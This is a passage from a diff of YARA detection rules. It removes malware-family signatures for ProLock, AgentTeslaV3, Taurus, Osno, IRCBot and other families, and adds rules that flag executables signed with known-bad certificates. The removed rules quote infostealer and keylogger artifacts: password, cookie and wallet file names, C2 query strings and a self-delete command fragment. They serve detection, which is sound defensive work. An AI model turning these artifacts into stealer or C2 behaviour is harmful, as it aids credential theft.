-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "jZQtQDMvyDRzWsoVFeitFmeNcWMtKauvidXSUrSEwqmi" and pe.signatures [ i ] . serial == "71:9a:c4:49:66:d0:57:62:ef:95:24:5e:ef:cf:30:46" )
 }
-rule DITEKSHEN_MALWARE_Win_Prolock : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008Fe807310D98357A59382090634B93F0 : FILE
 {
 	meta:
-		description = "ProLock ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bf4326b3-a838-5dff-a6e1-ac71c6fb871d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1397-L1413"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5539-L5550"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b"
+		logic_hash = "a90430a6f07f67ead37e5cba9f0baee92551511a9f33a2a1fd3d2419322aaa8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.ProLock"
-
-	strings:
-		$s1 = ".flat" fullword ascii
-		$s2 = ".data" fullword ascii
-		$s3 = ".api" fullword ascii
-		$s4 = "RtlZeroMemory" fullword ascii
-		$s5 = "LoadLibraryA" fullword ascii
-		$s6 = "Sleep" fullword ascii
-		$s7 = "lstrcatA" fullword ascii
-		$s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 }
+		thumbprint = "acd6cf38d03c355ddb84b96a7365bfc1738a0ec5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" )
 }
-rule DITEKSHEN_MALWARE_Win_Purplewave : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00801689896Ed339237464A41A2900A969 : FILE
 {
 	meta:
-		description = "PurpleWave infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6f978190-4b4d-5346-9218-0c9104254b45"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "91cecd18-0007-59a4-94f3-bdaa06b25822"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1415-L1432"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5552-L5563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a"
+		logic_hash = "9dc505e00e0085587aee2bf2e70db04850e11d057b8d16e31e8caebb130e047b"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/loader/" fullword ascii
-		$s2 = "\\load_" fullword wide
-		$s3 = "boundaryaswell" fullword ascii
-		$s4 = "[passwords]" ascii
-		$s5 = "[is_encrypted]" ascii
-		$s6 = "[cookies]" ascii
-		$s7 = ".?AVMozillaBrowser@@" fullword ascii
-		$s8 = ".?AVChromeBrowser@@" fullword ascii
-		$s9 = ".?AV?$money" ascii
-		$s10 = "at t.me/LuckyStoreSupport" ascii
+		thumbprint = "9b0ab2e7f3514f6372d14b1f7f963c155b18bd24"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" )
 }
-rule DITEKSHEN_MALWARE_Java_Pyrogenic
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Podangers : FILE
 {
 	meta:
-		description = "Pyrogenic/Qealler infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b394c4a1-1614-578f-bbfc-6eb9998b4a06"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1434-L1446"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5565-L5576"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24"
+		logic_hash = "6a041e8ae4a7a1af59b81799b5c014691e347c8305266adeffd9d49337712b2e"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "bbb6fec5ebef0d93" ascii wide
-		$s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide
-		$s3 = "addShutdownHook" ascii wide
-		$s4 = "obfuscated/META-INF/QeallerV" ascii wide
-		$s5 = "globalIpAddress" ascii wide
+		tags = "FILE"
+		thumbprint = "6e757c3b91d75d58b5230c27a2fcc01bfe5fe60f"
+		importance = 20
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PODANGERS" and pe.signatures [ i ] . serial == "00" )
 }
-rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E9A1E07314Bc2F2D51818454B63E5829 : FILE
 {
 	meta:
-		description = "AgentTeslaV3 infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c44c69dd-5e95-595c-88c7-89e243648198"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2c9f0497-0fcd-591c-be72-e92464b689f3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1448-L1481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5578-L5589"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac"
+		logic_hash = "e3dfb75350bcdbb6861612f2f6cc757724260f99e4024df2b20c7b273bc50266"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "get_kbok" fullword ascii
-		$s2 = "get_CHoo" fullword ascii
-		$s3 = "set_passwordIsSet" fullword ascii
-		$s4 = "get_enableLog" fullword ascii
-		$s5 = "bot%telegramapi%" wide
-		$s6 = "KillTorProcess" fullword ascii
-		$s7 = "GetMozilla" ascii
-		$s8 = "torbrowser" wide
-		$s9 = "%chatid%" wide
-		$s10 = "logins" fullword wide
-		$s11 = "credential" fullword wide
-		$s12 = "AccountConfiguration+" wide
-		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
-		$g1 = "get_Clipboard" fullword ascii
-		$g2 = "get_Keyboard" fullword ascii
-		$g3 = "get_Password" fullword ascii
-		$g4 = "get_CtrlKeyDown" fullword ascii
-		$g5 = "get_ShiftKeyDown" fullword ascii
-		$g6 = "get_AltKeyDown" fullword ascii
-		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
-		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
-		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
-		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
-		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
+		thumbprint = "3a146f3c0fc17b9df14bd127ebf12b15a5a1a011"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $* ) and all of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "iWLiYpLtpOlZYGmysAZkhz" and pe.signatures [ i ] . serial == "00:e9:a1:e0:73:14:bc:2f:2d:51:81:84:54:b6:3e:58:29" )
 }
-rule DITEKSHEN_MALWARE_Win_Taurus : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_9D915138Acdac1A044Afa6E5D99567C5 : FILE
 {
 	meta:
-		description = "Taurus infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "89182dfb-b100-573c-85ae-38bdf7f24a64"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1483-L1519"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5591-L5602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a"
+		logic_hash = "32fb0d12a9b61461104e29571fcc7210f7ea8a82a8e240c747a0070d8d43a9b0"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "t.me/taurus_se" ascii
-		$s2 = "rus_seller@explo" ascii
-		$s3 = "/c timeout /t 3  & del /f /q" ascii
-		$s4 = "MyAwesomePrefix" ascii
-		$txt1 = "LogInfo.txt" fullword ascii
-		$txt2 = "Information.txt" fullword ascii
-		$txt3 = "General\\passwords.txt" fullword ascii
-		$txt4 = "General\\forms.txt" fullword ascii
-		$txt5 = "General\\cards.txt" fullword ascii
-		$txt6 = "Installed Software.txt" fullword ascii
-		$txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii
-		$txt8 = "cookies.txt" fullword ascii
-		$url1 = "/cfg/" wide
-		$url2 = "/loader/complete/" wide
-		$url3 = "/log/" wide
-		$url4 = "/dlls/" wide
-		$upat = /\.exe;;;\d;\d;\d\]\|\[http/
-		$x1 = "Vaultcli.dll" fullword ascii
-		$x2 = "Bcrypt.dll" fullword ascii
-		$x3 = "*.localstor" ascii
-		$x4 = "operator<=>" fullword ascii
-		$x5 = ".data$rs" fullword ascii
-		$x6 = "https_discordap" ascii
-		$o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 }
-		$o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac }
-		$o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b }
-		$o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 }
-		$o5 = { 8d 8d ?? ff ff ff e8 5b }
+		thumbprint = "4f8b9ce0e25810d1b62d8c016607de128beba2a1"
+		importance = 20
 
 	condition:
-		(( 3 of ( $s* ) or ( 6 of ( $txt* ) and 2 of ( $s* ) ) or ( $upat and 1 of ( $s* ) and 2 of ( $txt* ) ) or ( all of ( $url* ) and ( 2 of ( $txt* ) or 1 of ( $s* ) ) ) ) or ( uint16( 0 ) == 0x5a4d and all of ( $x* ) or ( all of ( $o* ) and 3 of ( $x* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AAAruntest" and pe.signatures [ i ] . serial == "9d:91:51:38:ac:da:c1:a0:44:af:a6:e5:d9:95:67:c5" )
 }
-rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_11A9Bf6B2Dcbc683475B431A1C79133E : FILE
 {
 	meta:
-		description = "RemoteUtilitiesRAT RAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1cf3ece1-e723-5302-9673-273381ba7a8b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "9c49f529-330f-5d37-b613-e45aad50afcb"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1521-L1537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5604-L5615"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7"
+		logic_hash = "fa424180e60d2fde2fce085d0c848c5b33bcc58c2ca54f327f446ff5cf361fe2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT"
-
-	strings:
-		$s1 = "rman_message" wide
-		$s2 = "rms_invitation" wide
-		$s3 = "rms_host_" wide
-		$s4 = "rman_av_capture_settings" wide
-		$s5 = "rman_registry_key" wide
-		$s6 = "rms_system_information" wide
-		$s7 = "_rms_log.txt" wide
-		$s8 = "rms_internet_id_settings" wide
+		thumbprint = "7412b3f5ba689967a5b46e6ef5dc5e9b9de3917d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BINDOX" and pe.signatures [ i ] . serial == "11:a9:bf:6b:2d:cb:c6:83:47:5b:43:1a:1c:79:13:3e" )
 }
-rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Fd3661533Eef209153C9Afec3Ba4D8A : FILE
 {
 	meta:
-		description = "SlothfulMedia backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d47bc223-f29e-54d3-a452-064f89fa80f7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1539-L1565"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5617-L5628"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e"
+		logic_hash = "e9662abf4c70d54fc719850ef216352fd59a559726fbad5db9e265660400b432"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = /ExtKeylogger(Start|Stop)/ fullword ascii
-		$x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii
-		$x3 = /ExtRegKey(Add|Del)/ fullword ascii
-		$x4 = /ExtRegItem(Add|Del)/ fullword ascii
-		$x5 = "ExtUnload" fullword ascii
-		$s1 = "Local Security Process" fullword wide
-		$s2 = "Global%s%d" fullword wide
-		$s3 = "%s%s_%d.dat" fullword wide
-		$s4 = "\\AppIni" fullword wide
-		$s5 = "%s.tmp" fullword wide
-		$s6 = "\\SetupUi" fullword wide
-		$s7 = "%s|%s|%s|%s" fullword wide
-		$s8 = "\\ExtInfo" fullword wide
-		$cnc1 = "/v?m=" fullword ascii
-		$cnc2 = "%s&i=%d" fullword ascii
-		$cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii
-		$cnc4 = "Content-Length: %d" fullword ascii
+		thumbprint = "20ddd23f53e1ac49926335ec3e685a515ab49252"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 7 of ( $s* ) or all of ( $cnc* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" )
 }
-rule DITEKSHEN_MALWARE_Win_Ircbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Ba40F65086686Dd4Ab7171E : FILE
 {
 	meta:
-		description = "IRCBot payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "69739d82-9760-5c4e-bf9e-60c60617a12a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "13909741-cba3-5143-86eb-bcc227cfaa9c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1567-L1596"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5630-L5641"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818"
+		logic_hash = "8ed65c0b5d231be9dbbe34da493087d1bf83cf21c401435fed7e2851acdb6f60"
 		score = 75
-		quality = 42
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ".okuninstall" fullword wide
-		$s2 = ".oksnapshot" fullword wide
-		$s3 = "\\uspread.vbs" fullword wide
-		$s4 = "KEYLogger" ascii nocase
-		$s5 = "GetKeyLogs" fullword ascii
-		$s6 = "GetLoocationInfo" fullword ascii
-		$s7 = "CaputerScreenshot" fullword ascii
-		$s8 = "get_SCRIPT_DATA" fullword ascii
-		$s9 = /irc_(server|nickname|password|channle)/ fullword ascii
-		$s10 = "machine_screenshot" fullword ascii
-		$s11 = "CollectPassword" fullword ascii
-		$s12 = "USBInfection" fullword ascii nocase
-		$cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide
-		$cnc2 = "&machine_os=1&privateip=" wide
-		$cnc3 = "&command=InsertTaskExecution&excuter_id=" wide
-		$cnc4 = "&command=RegisterNewMachine" wide
-		$cnc5 = "&command=UpdateNewMachine" wide
-		$cnc6 = "&command=GetPayloads&keys=" wide
-		$cnc7 = "&command=SaveSnapshot" wide
-		$pdb = "\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii
+		thumbprint = "842f81869c2f4f2ba2a7e6513501166e2679108a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 3 of ( $cnc* ) or ( $pdb and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SISTEMS LLC" and pe.signatures [ i ] . serial == "2b:a4:0f:65:08:66:86:dd:4a:b7:17:1e" )
 }
-rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_67144B9Ed89Fb2D106D0233873C6E35F : FILE
 {
 	meta:
-		description = "Apocalypse infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f9806e55-9efa-504a-b27c-d3418fc5cd38"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1598-L1615"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5643-L5654"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27"
+		logic_hash = "9d3c39c590a75b3ea1d1f699bea279c0c68498e51e2ab7f4ad3e3f8857d6d668"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "OpenClipboard" fullword ascii
-		$s2 = "SendARP" fullword ascii
-		$s3 = "GetWebRequest" fullword ascii
-		$s4 = "DotNetGuard" fullword ascii
-		$s5 = "set_CreateNoWindow" fullword ascii
-		$s6 = "UploadFile" fullword ascii
-		$s7 = "GetHINSTANCE" fullword ascii
-		$s8 = "Kill" fullword ascii
-		$s9 = "GetProcesses" fullword ascii
-		$s10 = "get_PrimaryScreen" fullword ascii
+		thumbprint = "5971faead4c86bf72e6ab36efc0376d4abfffeda"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infosignal LLC" and pe.signatures [ i ] . serial == "67:14:4b:9e:d8:9f:b2:d1:06:d0:23:38:73:c6:e3:5f" )
 }
-rule DITEKSHEN_MALWARE_Win_Osno : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ca4822E6905Aa4Fca9E28523F04F14A3 : FILE
 {
 	meta:
-		description = "Osno ransomware and infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "713f84b3-b09a-5fcf-85ed-899be9f14b84"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1617-L1652"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5656-L5667"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f"
+		logic_hash = "6e0d7abd82805019c6b1c9df2479489bbd3fe7a4a1703971c02324072692b1e5"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ".HolyGate+<>c+<<FinalBoss>" ascii
-		$s2 = /Osno(Keylogger|Stealer|Ransom)/ wide
-		$s3 = "password,executeWebhook('Account credentials" wide
-		$s4 = "-Name Osno -PropertyType" wide
-		$s5 = "process.env.hook" ascii
-		$s6 = "Stealer.JSON.JsonValue" ascii
-		$s7 = "<DetectBrowserss>b_" ascii
-		$s8 = "<TryGetDiscordPath>b_" ascii
-		$s9 = "antiVM" fullword ascii
-		$s10 = "downloadurl" fullword ascii
-		$s11 = "set_sPassword" fullword ascii
-		$txt0 = "{0} {1} .txt" fullword wide
-		$txt1 = "\\ScanningNetworks.txt" fullword wide
-		$txt2 = "\\SteamApps.txt" fullword wide
-		$txt3 = "-ErrorsLogs.txt" fullword wide
-		$txt4 = "-keylogs.txt" fullword wide
-		$txt5 = "Hardware & Soft.txt" fullword wide
-		$cnc0 = "/csharp/" ascii wide
-		$cnc1 = "token=" ascii wide
-		$cnc2 = "&timestamp=" ascii wide
-		$cnc3 = "&session_id=" ascii wide
-		$cnc4 = "&aid=" ascii wide
-		$cnc5 = "&secret=" ascii wide
-		$cnc6 = "&api_key" ascii wide
-		$cnc7 = "&session_key=" ascii wide
-		$cnc8 = "&type=" ascii wide
+		thumbprint = "35ced9662401f10fa92282e062a8b5588e0c674d"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $txt* ) or ( 4 of ( $s* ) and 2 of ( $txt* ) ) ) ) or ( 7 of ( $cnc* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" )
 }
-rule DITEKSHEN_MALWARE_Win_Betabot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3769815A97A8Fb411E005282B37878E3 : FILE
 {
 	meta:
-		description = "BetaBot payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "377c500c-5727-5bea-ac46-cb69c868a607"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "da41e9a7-1660-5157-9148-f2f774df647a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1654-L1666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5669-L5680"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d"
+		logic_hash = "ccd548ebe2be2c7b44e6c39df50ffea4703d0b1decd78cc6fb4b3bbf9d85be0b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "__restart" fullword ascii
-		$s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide
-		$s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide
-		$s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii
-		$s5 = "VirtualProtectEx" fullword ascii
+		thumbprint = "c80fd3259af331743e35a2197f5f57061654860c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Yandex" and pe.signatures [ i ] . serial == "37:69:81:5a:97:a8:fb:41:1e:00:52:82:b3:78:78:e3" )
 }
-rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3B007314844B114C61Bc156A0609A286 : FILE
 {
 	meta:
-		description = "WSHRAT keylogger plugin payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bb68c2fc-2389-5fb8-96f0-5731f008fd3c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1668-L1685"
